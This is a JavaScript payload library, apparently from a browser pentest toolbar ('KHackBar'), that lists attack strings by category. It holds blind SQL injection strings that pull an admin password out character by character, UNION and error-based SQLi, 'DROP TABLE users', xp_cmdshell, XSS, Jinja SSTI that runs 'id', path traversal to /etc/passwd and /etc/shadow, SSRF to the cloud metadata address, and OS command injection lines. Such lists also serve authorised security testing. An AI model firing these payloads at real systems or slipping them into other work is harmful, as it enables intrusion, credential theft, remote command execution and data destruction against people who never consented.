    "1' AND BENCHMARK(10000000,MD5('test'))-- -",
    "1' AND BENCHMARK(15000000,MD5('test'))-- -",
    "' AND 1=1-- -",
    "' AND 1=2-- -",
    "' AND SLEEP(5)-- -",
    "' AND SLEEP(10)-- -",
    "' AND SLEEP(15)-- -",
    "1 AND 1=1-- -",
    "1 AND 1=2-- -",
    "1 AND SLEEP(5)-- -",
    "1 AND SLEEP(10)-- -",
    "1 AND SLEEP(15)-- -",
    "1' AND 1=(SELECT 1 FROM dual)-- -",
    "1' AND 1=(SELECT 1 FROM mysql.user)-- -",
    "1' AND (SELECT 1 FROM information_schema.tables LIMIT 1)-- -",
    "1' AND EXISTS(SELECT 1 FROM users)-- -",
    "1' AND EXISTS(SELECT 1 FROM users WHERE username='admin')-- -",
    "1' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'-- -",
    "1' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>97-- -",
    "1' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))<122-- -",
    "1' AND ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20) FROM users WHERE username='admin'),1,1))>64-- -",
    "1' AND IF(1=1,SLEEP(5),0)-- -",
    "1' AND IF(1=2,SLEEP(5),0)-- -",
    "1' AND (SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END))-- -",
    "' AND 1=(SELECT 1 FROM dual)-- -",
    "' AND 1=(SELECT 1 FROM mysql.user)-- -",
    "' AND EXISTS(SELECT 1 FROM users)-- -",
    "' AND EXISTS(SELECT 1 FROM users WHERE username='admin')-- -"
  ],

  replace: [
    "' OR '1'='1",
    "' OR 1=1-- -",
    "<script>alert(1)</script>",
    "{{7*7}}",
    "${7*7}",
    "../../../etc/passwd",
    "1' AND SLEEP(5)-- -",
    "' UNION SELECT 1,2,3-- -",
    "'; DROP TABLE users-- -",
    "' OR '1'='1",
    "' OR 1=1-- -",
    "' OR 1=1#",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR 1=1/*",
    "1 UNION SELECT 1,2,3-- -",
    "1 UNION SELECT 1,2,3,4-- -",
    "1 UNION SELECT 1,2,3,4,5-- -",
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "{{config}}",
    "{{lipsum.__globals__['os'].popen('id').read()}}",
    "${7*7}",
    "#{7*7}",
    "*{7*7}",
    "../../../etc/passwd",
    "../../../etc/shadow",
    "../../../etc/hosts",
    "http://127.0.0.1:80",
    "http://localhost:80",
    "http://169.254.169.254/",
    "' || 1==1//",
    "' && 1==1//",
    "1' AND SLEEP(5)-- -",
    "1' AND BENCHMARK(10000000,MD5('test'))-- -",
    "' WAITFOR DELAY '00:00:05'--",
    "1 WAITFOR DELAY '00:00:05'--",
    "'; EXEC xp_cmdshell('whoami')--",
    "' OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT @@version),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)-- -"
  ],

  osci: [
    "1; whoami",
    "1; id",
    "1; ls",
    "1; cat /etc/passwd",
    "1; uname -a",
    "1; ifconfig",
    "1; pwd",
    "1; echo test",
    "1| whoami",
    "1| id",
    "1| ls",
    "1| cat /etc/passwd",
    "1| uname -a",
    "1| ifconfig",
    "1| pwd",
    "1`whoami`",
    "1`id`",
    "1`ls`",
    "1`cat /etc/passwd`",
    "1`uname -a`",
    "1`ifconfig`",
    "1$(whoami)",
    "1$(id)",
    "1$(ls)",
    "1$(cat /etc/passwd)",
    "1$(uname -a)",
    "1$(ifconfig)",
    "1' && whoami && '1'='1",
    "1' && id && '1'='1",
    "1' && ls && '1'='1",
    "1' && cat /etc/passwd && '1'='1",
    "1\" && whoami && \"1\"=\"1",
    "1\" && id && \"1\"=\"1",
    "1\" && ls && \"1\"=\"1",
    "1\" && cat /etc/passwd && \"1\"=\"1",
    "1' | whoami",
    "1' | id",
    "1' | ls",
    "1' | cat /etc/passwd",
    "1\" | whoami",
    "1\" | id",
    "1\" | ls",
    "1\" | cat /etc/passwd",
    "1 & whoami",
    "1 && whoami",
    "1 || whoami",
    "1 && id",
    "1 && ls",
    "1 && cat /etc/passwd",
    "1 && uname -a",
    "1 && ifconfig",
    "| whoami",
    "| id",
    "| ls",
    "| cat /etc/passwd",
    "| uname -a",
    "| ifconfig"
  ]
};

// ---- Extraction Handlers (for data extraction view) ----
const extractionHandlers = {
  default: function(text) { return text; },
  regex: function(text, pattern) {
    try {
      const regex = new RegExp(pattern, 'gi');
      const matches = text.match(regex);
      return matches ? matches.join('\n') : 'No matches found.';
    } catch (e) {
      return 'Regex error: ' + e.message;
    }
  },
  json: function(text) {
    try {
      return JSON.stringify(JSON.parse(text), null, 2);
    } catch (e) {
      return 'Invalid JSON: ' + e.message;
    }
  },
  hex: function(text) {
    return text.split('').map(function(c) {
      return '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0');
    }).join('');
  }
};

// ---- Prompt Logic (for display/UI helpers) ----
const promptLogic = {
  getCategory: function(id) {
    const map = {
      sql: 'SQL Injection', union: 'UNION Based', wafunion: 'WAF UNION',
      waf: 'WAF Bypass', mysqldios: 'MySQL DIOS', postgredios: 'PostgreSQL DIOS',
      localdios: 'Local File DIOS', mssql: 'MsSQL Injection', error: 'Error Based',
      xss: 'XSS Injection', lfi: 'Local File Inclusion', nosql: 'NoSQL Injection',
      ssrf: 'SSRF', ssrf_rce: 'SSRF + RCE', ssti: 'SSTI',
      blind: 'Blind SQLi', replace: 'Replace', osci: 'OS Command Injection'
    };
    return map[id] || id;
  },

  getPayloadCount: function(category) {
    return predatorData[category] ? predatorData[category].length : 0;
  }
};

// ---- Expose to namespace ----
window.KHackBar.Payloads.predatorData = predatorData;
window.KHackBar.Payloads.extractionHandlers = extractionHandlers;
window.KHackBar.Payloads.promptLogic = promptLogic;
